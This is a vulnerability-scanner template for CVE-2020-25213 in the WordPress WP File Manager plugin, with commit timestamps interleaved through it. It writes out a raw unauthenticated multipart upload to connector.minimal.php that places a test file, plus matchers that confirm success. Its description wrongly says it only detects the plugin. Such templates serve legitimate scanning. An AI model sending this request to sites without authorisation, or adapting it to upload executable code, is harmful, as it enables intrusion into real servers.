2021-03-11 10:56:53 +00:00
id : CVE-2020-25213
2021-02-11 19:18:25 +00:00
info :
name : WP File Manager RCE
author : foulenzer
severity : critical
description : The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 10:56:53 +00:00
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
2021-02-11 19:18:25 +00:00
tags : cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
requests :
- raw :
- |
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Length : 608
Content-Type : multipart/form-data; boundary=------------------------ca81ac1fececda48
Connection : close
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="reqid"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
17457a1fe6959
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="cmd"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
upload
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="target"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
l1_Lw
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="mtime[]"
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
1576045135
--------------------------ca81ac1fececda48
Content-Disposition : form-data; name="upload[]"; filename="poc.txt"
Content-Type : text/plain
2021-02-11 19:23:19 +00:00
2021-02-11 19:18:25 +00:00
poc-test
--------------------------ca81ac1fececda48--
matchers-condition : and
matchers :
- type : word
words :
- poc.txt
- added
condition : and
- type : word
words :
- application/json
part : header
- type : status
status :
- 200